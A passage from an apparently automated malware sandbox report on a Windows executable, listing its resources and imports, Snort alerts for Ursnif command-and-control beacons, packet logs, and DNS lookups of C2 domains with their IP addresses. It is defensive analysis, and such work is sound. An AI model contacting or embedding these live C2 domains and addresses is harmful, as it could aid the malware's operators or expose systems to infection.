                        RT_DIALOG0x7dbd80x52data
                        RT_STRING0x7dc2c0x15cdata
                        RT_STRING0x7dd880x3e4data
                        RT_STRING0x7e16c0x340data
                        RT_STRING0x7e4ac0x354data
                        RT_STRING0x7e8000x230data
                        RT_STRING0x7ea300x1d4data
                        RT_STRING0x7ec040xecdata
                        RT_STRING0x7ecf00x2fcdata
                        RT_STRING0x7efec0xd4data
                        RT_STRING0x7f0c00x110data
                        RT_STRING0x7f1d00x24cdata
                        RT_STRING0x7f41c0x3f8data
                        RT_STRING0x7f8140x360data
                        RT_STRING0x7fb740x3e8data
                        RT_STRING0x7ff5c0x234data
                        RT_STRING0x801900xecdata
                        RT_STRING0x8027c0x1b4data
                        RT_STRING0x804300x3e4data
                        RT_STRING0x808140x358data
                        RT_STRING0x80b6c0x2b4data
                        RT_RCDATA0x80e200x10data
                        RT_RCDATA0x80e300x2feMS Windows icon resource - 1 icon, 32x32, 16 colorsBulgarianBulgaria
                        RT_RCDATA0x811300x104GIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x812340x10bGIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x813400xedGIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x814300xe4GIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x815140xfeGIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x816140x96GIF image data, version 89a, 24 x 24BulgarianBulgaria
                        RT_RCDATA0x816ac0x10cGIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x817b80x105GIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x818c00x102GIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x819c40xfbGIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x81ac00x10eGIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x81bd00x105GIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x81cd80x100GIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x81dd80xfcGIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x81ed40x113GIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x81fe80x10eGIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x820f80x106GIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x822000xfdGIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x823000x115GIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x824180x113GIF image data, version 89a, 22 x 22BulgarianBulgaria
                        RT_RCDATA0x8252c0x229HTML document, ASCII text, with CRLF, CR line terminatorsBulgarianBulgaria
                        RT_RCDATA0x827580x3fGIF image data, version 89a, 12 x 16BulgarianBulgaria
                        RT_RCDATA0x827980x6eGIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x828080x50GIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x828580x6cGIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x828c40x4fGIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x829140x6fGIF image data, version 89a, 17 x 16BulgarianBulgaria
                        RT_RCDATA0x829840x41GIF image data, version 89a, 15 x 15BulgarianBulgaria
                        RT_RCDATA0x829c80x3cGIF image data, version 89a, 16 x 12BulgarianBulgaria
                        RT_RCDATA0x82a040x69GIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x82a700x4dGIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x82ac00x71GIF image data, version 89a, 16 x 17BulgarianBulgaria
                        RT_RCDATA0x82b340x69GIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x82ba00x4dGIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x82bf00x12cGIF image data, version 89a, 10 x 12BulgarianBulgaria
                        RT_RCDATA0x82d1c0x129GIF image data, version 89a, 10 x 12BulgarianBulgaria
                        RT_RCDATA0x82e480x91GIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x82edc0x82GIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x82f600x75GIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x82fd80x9eGIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x830780x7cGIF image data, version 89a, 16 x 16BulgarianBulgaria
                        RT_RCDATA0x830f40x36GIF image data, version 89a, 1 x 1BulgarianBulgaria
                        RT_RCDATA0x8312c0xea6HTML document, ASCII text, with CRLF line terminatorsBulgarianBulgaria
                        RT_RCDATA0x83fd40x2b9fASCII text, with CRLF line terminatorsBulgarianBulgaria
                        RT_RCDATA0x86b740x4e98ASCII text, with CRLF line terminatorsBulgarianBulgaria
                        RT_RCDATA0x8ba0c0x539ASCII text, with CRLF line terminatorsBulgarianBulgaria
                        RT_RCDATA0x8bf480x1d08HTML document, ASCII text, with CRLF line terminatorsBulgarianBulgaria
                        RT_RCDATA0x8dc500x61bASCII text, with CRLF line terminatorsBulgarianBulgaria
                        RT_RCDATA0x8e26c0x671ASCII text, with CRLF line terminatorsBulgarianBulgaria
                        RT_RCDATA0x8e8e00x7e61ASCII text, with CRLF line terminatorsBulgarianBulgaria
                        RT_RCDATA0x967440xd59HTML document, ASCII text, with CRLF line terminatorsBulgarianBulgaria
                        RT_RCDATA0x974a00x664data
                        RT_RCDATA0x97b040x1c9Delphi compiled form 'Tgj3eo9f8hwe89fq'
                        RT_RCDATA0x97cd00xb804dataEnglishUnited States
                        RT_GROUP_CURSOR0xa34d40x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa34e80x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa34fc0x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa35100x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa35240x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa35380x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_CURSOR0xa354c0x14Lotus unknown worksheet or configuration, revision 0x1
                        RT_GROUP_ICON0xa35600x14dataEnglishUnited States

                        Imports

                        DLLImport
                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                        user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                        kernel32.dllTlsSetValue, TlsGetValue, TlsFree, TlsAlloc, LocalFree, LocalAlloc
                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                        kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetTempPathA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                        gdi32.dllUnrealizeObject, StrokePath, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
                        user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                        kernel32.dllSleep
                        oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                        ole32.dllCoUninitialize, CoInitialize
                        oleaut32.dllGetErrorInfo, SysFreeString
                        comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        BulgarianBulgaria

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        01/26/22-17:03:29.526106TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975380192.168.2.513.107.42.16
                        01/26/22-17:03:50.217694TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975880192.168.2.5194.76.226.200
                        01/26/22-17:04:11.131587TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977180192.168.2.5211.119.84.112
                        01/26/22-17:04:11.131587TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977180192.168.2.5211.119.84.112
                        01/26/22-17:04:32.817920TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4978180192.168.2.541.41.255.235
                        01/26/22-17:04:53.808751TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4981280192.168.2.531.214.157.187
                        01/26/22-17:04:53.808751TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4981280192.168.2.531.214.157.187
                        01/26/22-17:05:14.219179TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4981480192.168.2.513.107.43.16
                        01/26/22-17:05:55.173450TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982580192.168.2.5181.129.180.251
                        01/26/22-17:06:16.920281TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982780192.168.2.561.36.14.230
                        01/26/22-17:06:38.188650TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982880192.168.2.531.214.157.187
                        01/26/22-17:06:59.014573TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4982980192.168.2.513.107.43.16
                        01/26/22-17:06:59.014573TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4982980192.168.2.513.107.43.16

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 26, 2022 17:03:50.196054935 CET4975880192.168.2.5194.76.226.200
                        Jan 26, 2022 17:03:50.216969967 CET8049758194.76.226.200192.168.2.5
                        Jan 26, 2022 17:03:50.217222929 CET4975880192.168.2.5194.76.226.200
                        Jan 26, 2022 17:03:50.217694044 CET4975880192.168.2.5194.76.226.200
                        Jan 26, 2022 17:03:50.240555048 CET8049758194.76.226.200192.168.2.5
                        Jan 26, 2022 17:03:50.485863924 CET8049758194.76.226.200192.168.2.5
                        Jan 26, 2022 17:03:50.527489901 CET4975880192.168.2.5194.76.226.200
                        Jan 26, 2022 17:04:10.823165894 CET4977180192.168.2.5211.119.84.112
                        Jan 26, 2022 17:04:11.131019115 CET8049771211.119.84.112192.168.2.5
                        Jan 26, 2022 17:04:11.131146908 CET4977180192.168.2.5211.119.84.112
                        Jan 26, 2022 17:04:11.131587029 CET4977180192.168.2.5211.119.84.112
                        Jan 26, 2022 17:04:11.641944885 CET8049771211.119.84.112192.168.2.5
                        Jan 26, 2022 17:04:12.363171101 CET8049771211.119.84.112192.168.2.5
                        Jan 26, 2022 17:04:12.363260984 CET8049771211.119.84.112192.168.2.5
                        Jan 26, 2022 17:04:12.363360882 CET4977180192.168.2.5211.119.84.112
                        Jan 26, 2022 17:04:12.363540888 CET4977180192.168.2.5211.119.84.112
                        Jan 26, 2022 17:04:12.671621084 CET8049771211.119.84.112192.168.2.5
                        Jan 26, 2022 17:04:32.723215103 CET4978180192.168.2.541.41.255.235
                        Jan 26, 2022 17:04:32.817071915 CET804978141.41.255.235192.168.2.5
                        Jan 26, 2022 17:04:32.817342997 CET4978180192.168.2.541.41.255.235
                        Jan 26, 2022 17:04:32.817919970 CET4978180192.168.2.541.41.255.235
                        Jan 26, 2022 17:04:33.109745026 CET804978141.41.255.235192.168.2.5
                        Jan 26, 2022 17:04:33.531102896 CET804978141.41.255.235192.168.2.5
                        Jan 26, 2022 17:04:33.531539917 CET804978141.41.255.235192.168.2.5
                        Jan 26, 2022 17:04:33.531630993 CET4978180192.168.2.541.41.255.235
                        Jan 26, 2022 17:04:33.531966925 CET4978180192.168.2.541.41.255.235
                        Jan 26, 2022 17:04:33.613989115 CET804978141.41.255.235192.168.2.5
                        Jan 26, 2022 17:04:53.780751944 CET4981280192.168.2.531.214.157.187
                        Jan 26, 2022 17:04:53.807960033 CET804981231.214.157.187192.168.2.5
                        Jan 26, 2022 17:04:53.808163881 CET4981280192.168.2.531.214.157.187
                        Jan 26, 2022 17:04:53.808751106 CET4981280192.168.2.531.214.157.187
                        Jan 26, 2022 17:04:53.835407972 CET804981231.214.157.187192.168.2.5
                        Jan 26, 2022 17:04:54.068263054 CET804981231.214.157.187192.168.2.5
                        Jan 26, 2022 17:04:54.110872984 CET4981280192.168.2.531.214.157.187
                        Jan 26, 2022 17:04:55.488312960 CET8049758194.76.226.200192.168.2.5
                        Jan 26, 2022 17:04:55.489257097 CET4975880192.168.2.5194.76.226.200
                        Jan 26, 2022 17:04:55.489376068 CET4975880192.168.2.5194.76.226.200
                        Jan 26, 2022 17:04:55.509185076 CET8049758194.76.226.200192.168.2.5
                        Jan 26, 2022 17:05:19.442369938 CET4981280192.168.2.531.214.157.187
                        Jan 26, 2022 17:05:19.469677925 CET804981231.214.157.187192.168.2.5
                        Jan 26, 2022 17:05:19.469788074 CET4981280192.168.2.531.214.157.187
                        Jan 26, 2022 17:05:34.284610987 CET4981680192.168.2.5194.76.226.200
                        Jan 26, 2022 17:05:34.305545092 CET8049816194.76.226.200192.168.2.5
                        Jan 26, 2022 17:05:34.307151079 CET4981680192.168.2.5194.76.226.200
                        Jan 26, 2022 17:05:34.308445930 CET4981680192.168.2.5194.76.226.200
                        Jan 26, 2022 17:05:34.328700066 CET8049816194.76.226.200192.168.2.5
                        Jan 26, 2022 17:05:34.582305908 CET8049816194.76.226.200192.168.2.5
                        Jan 26, 2022 17:05:34.735786915 CET4981680192.168.2.5194.76.226.200
                        Jan 26, 2022 17:05:54.993796110 CET4982580192.168.2.5181.129.180.251
                        Jan 26, 2022 17:05:55.171062946 CET8049825181.129.180.251192.168.2.5
                        Jan 26, 2022 17:05:55.171247959 CET4982580192.168.2.5181.129.180.251
                        Jan 26, 2022 17:05:55.173449993 CET4982580192.168.2.5181.129.180.251
                        Jan 26, 2022 17:05:55.585179090 CET8049825181.129.180.251192.168.2.5
                        Jan 26, 2022 17:05:56.107831001 CET8049825181.129.180.251192.168.2.5
                        Jan 26, 2022 17:05:56.107940912 CET8049825181.129.180.251192.168.2.5
                        Jan 26, 2022 17:05:56.108086109 CET4982580192.168.2.5181.129.180.251
                        Jan 26, 2022 17:05:56.108222008 CET4982580192.168.2.5181.129.180.251
                        Jan 26, 2022 17:05:56.284883976 CET8049825181.129.180.251192.168.2.5
                        Jan 26, 2022 17:06:16.600522995 CET4982780192.168.2.561.36.14.230
                        Jan 26, 2022 17:06:16.919651031 CET804982761.36.14.230192.168.2.5
                        Jan 26, 2022 17:06:16.919747114 CET4982780192.168.2.561.36.14.230
                        Jan 26, 2022 17:06:16.920280933 CET4982780192.168.2.561.36.14.230
                        Jan 26, 2022 17:06:17.439112902 CET804982761.36.14.230192.168.2.5
                        Jan 26, 2022 17:06:18.136353016 CET804982761.36.14.230192.168.2.5
                        Jan 26, 2022 17:06:18.136398077 CET804982761.36.14.230192.168.2.5
                        Jan 26, 2022 17:06:18.136567116 CET4982780192.168.2.561.36.14.230
                        Jan 26, 2022 17:06:18.136715889 CET4982780192.168.2.561.36.14.230
                        Jan 26, 2022 17:06:18.455836058 CET804982761.36.14.230192.168.2.5
                        Jan 26, 2022 17:06:38.157824993 CET4982880192.168.2.531.214.157.187
                        Jan 26, 2022 17:06:38.188126087 CET804982831.214.157.187192.168.2.5
                        Jan 26, 2022 17:06:38.188208103 CET4982880192.168.2.531.214.157.187
                        Jan 26, 2022 17:06:38.188649893 CET4982880192.168.2.531.214.157.187
                        Jan 26, 2022 17:06:38.218698025 CET804982831.214.157.187192.168.2.5
                        Jan 26, 2022 17:06:38.456873894 CET804982831.214.157.187192.168.2.5
                        Jan 26, 2022 17:06:38.508755922 CET4982880192.168.2.531.214.157.187
                        Jan 26, 2022 17:06:39.579426050 CET8049816194.76.226.200192.168.2.5
                        Jan 26, 2022 17:06:39.579612017 CET4981680192.168.2.5194.76.226.200
                        Jan 26, 2022 17:06:39.787955999 CET4981680192.168.2.5194.76.226.200
                        Jan 26, 2022 17:06:39.808128119 CET8049816194.76.226.200192.168.2.5
                        Jan 26, 2022 17:07:09.449675083 CET4982880192.168.2.531.214.157.187
                        Jan 26, 2022 17:07:09.480206013 CET804982831.214.157.187192.168.2.5
                        Jan 26, 2022 17:07:09.482753038 CET4982880192.168.2.531.214.157.187

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jan 26, 2022 17:04:10.702095032 CET6318353192.168.2.58.8.8.8
                        Jan 26, 2022 17:04:10.821247101 CET53631838.8.8.8192.168.2.5
                        Jan 26, 2022 17:04:32.537123919 CET5696953192.168.2.58.8.8.8
                        Jan 26, 2022 17:04:32.720880985 CET53569698.8.8.8192.168.2.5
                        Jan 26, 2022 17:05:54.678286076 CET6373253192.168.2.58.8.8.8
                        Jan 26, 2022 17:05:54.987817049 CET53637328.8.8.8192.168.2.5
                        Jan 26, 2022 17:06:16.351515055 CET5445053192.168.2.58.8.8.8
                        Jan 26, 2022 17:06:16.595956087 CET53544508.8.8.8192.168.2.5

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Jan 26, 2022 17:04:10.702095032 CET192.168.2.58.8.8.80xb2eStandard query (0)giporedtrip.atA (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:32.537123919 CET192.168.2.58.8.8.80x72fStandard query (0)habpfans.atA (IP address)IN (0x0001)
                        Jan 26, 2022 17:05:54.678286076 CET192.168.2.58.8.8.80xdb34Standard query (0)giporedtrip.atA (IP address)IN (0x0001)
                        Jan 26, 2022 17:06:16.351515055 CET192.168.2.58.8.8.80x5295Standard query (0)habpfans.atA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Jan 26, 2022 17:04:10.821247101 CET8.8.8.8192.168.2.50xb2eNo error (0)giporedtrip.at211.119.84.112A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:10.821247101 CET8.8.8.8192.168.2.50xb2eNo error (0)giporedtrip.at183.78.205.92A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:10.821247101 CET8.8.8.8192.168.2.50xb2eNo error (0)giporedtrip.at210.92.250.133A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:10.821247101 CET8.8.8.8192.168.2.50xb2eNo error (0)giporedtrip.at187.232.235.234A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:10.821247101 CET8.8.8.8192.168.2.50xb2eNo error (0)giporedtrip.at183.100.39.157A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:10.821247101 CET8.8.8.8192.168.2.50xb2eNo error (0)giporedtrip.at203.228.9.102A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:10.821247101 CET8.8.8.8192.168.2.50xb2eNo error (0)giporedtrip.at41.41.255.235A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:10.821247101 CET8.8.8.8192.168.2.50xb2eNo error (0)giporedtrip.at186.6.45.193A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:10.821247101 CET8.8.8.8192.168.2.50xb2eNo error (0)giporedtrip.at197.44.54.172A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:10.821247101 CET8.8.8.8192.168.2.50xb2eNo error (0)giporedtrip.at151.251.30.69A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:32.720880985 CET8.8.8.8192.168.2.50x72fNo error (0)habpfans.at41.41.255.235A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:32.720880985 CET8.8.8.8192.168.2.50x72fNo error (0)habpfans.at186.6.45.193A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:32.720880985 CET8.8.8.8192.168.2.50x72fNo error (0)habpfans.at197.44.54.172A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:32.720880985 CET8.8.8.8192.168.2.50x72fNo error (0)habpfans.at151.251.30.69A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:32.720880985 CET8.8.8.8192.168.2.50x72fNo error (0)habpfans.at211.119.84.112A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:32.720880985 CET8.8.8.8192.168.2.50x72fNo error (0)habpfans.at183.78.205.92A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:32.720880985 CET8.8.8.8192.168.2.50x72fNo error (0)habpfans.at210.92.250.133A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:32.720880985 CET8.8.8.8192.168.2.50x72fNo error (0)habpfans.at187.232.235.234A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:32.720880985 CET8.8.8.8192.168.2.50x72fNo error (0)habpfans.at183.100.39.157A (IP address)IN (0x0001)
                        Jan 26, 2022 17:04:32.720880985 CET8.8.8.8192.168.2.50x72fNo error (0)habpfans.at203.228.9.102A (IP address)IN (0x0001)
                        Jan 26, 2022 17:05:54.987817049 CET8.8.8.8192.168.2.50xdb34No error (0)giporedtrip.at181.129.180.251A (IP address)IN (0x0001)
                        Jan 26, 2022 17:05:54.987817049 CET8.8.8.8192.168.2.50xdb34No error (0)giporedtrip.at222.236.49.124A (IP address)IN (0x0001)
                        Jan 26, 2022 17:05:54.987817049 CET8.8.8.8192.168.2.50xdb34No error (0)giporedtrip.at187.212.179.214A (IP address)IN (0x0001)
                        Jan 26, 2022 17:05:54.987817049 CET8.8.8.8192.168.2.50xdb34No error (0)giporedtrip.at95.104.121.111A (IP address)IN (0x0001)
                        Jan 26, 2022 17:05:54.987817049 CET8.8.8.8192.168.2.50xdb34No error (0)giporedtrip.at178.31.236.98A (IP address)IN (0x0001)
                        Jan 26, 2022 17:05:54.987817049 CET8.8.8.8192.168.2.50xdb34No error (0)giporedtrip.at31.167.149.141A (IP address)IN (0x0001)
                        Jan 26, 2022 17:05:54.987817049 CET8.8.8.8192.168.2.50xdb34No error (0)giporedtrip.at58.235.189.190A (IP address)IN (0x0001)
                        Jan 26, 2022 17:05:54.987817049 CET8.8.8.8192.168.2.50xdb34No error (0)giporedtrip.at61.36.14.230A (IP address)IN (0x0001)
                        Jan 26, 2022 17:05:54.987817049 CET8.8.8.8192.168.2.50xdb34No error (0)giporedtrip.at14.51.96.70A (IP address)IN (0x0001)
                        Jan 26, 2022 17:05:54.987817049 CET8.8.8.8192.168.2.50xdb34No error (0)giporedtrip.at180.69.193.102A (IP address)IN (0x0001)
                        Jan 26, 2022 17:06:16.595956087 CET8.8.8.8192.168.2.50x5295No error (0)habpfans.at61.36.14.230A (IP address)IN (0x0001)
                        Jan 26, 2022 17:06:16.595956087 CET8.8.8.8192.168.2.50x5295No error (0)habpfans.at14.51.96.70A (IP address)IN (0x0001)
                        Jan 26, 2022 17:06:16.595956087 CET8.8.8.8192.168.2.50x5295No error (0)habpfans.at180.69.193.102A (IP address)IN (0x0001)
                        Jan 26, 2022 17:06:16.595956087 CET8.8.8.8192.168.2.50x5295No error (0)habpfans.at181.129.180.251A (IP address)IN (0x0001)
                        Jan 26, 2022 17:06:16.595956087 CET8.8.8.8192.168.2.50x5295No error (0)habpfans.at222.236.49.124A (IP address)IN (0x0001)
                        Jan 26, 2022 17:06:16.595956087 CET8.8.8.8192.168.2.50x5295No error (0)habpfans.at187.212.179.214A (IP address)IN (0x0001)
                        Jan 26, 2022 17:06:16.595956087 CET8.8.8.8192.168.2.50x5295No error (0)habpfans.at95.104.121.111A (IP address)IN (0x0001)
                        Jan 26, 2022 17:06:16.595956087 CET8.8.8.8192.168.2.50x5295No error (0)habpfans.at178.31.236.98A (IP address)IN (0x0001)
                        Jan 26, 2022 17:06:16.595956087 CET8.8.8.8192.168.2.50x5295No error (0)habpfans.at31.167.149.141A (IP address)IN (0x0001)
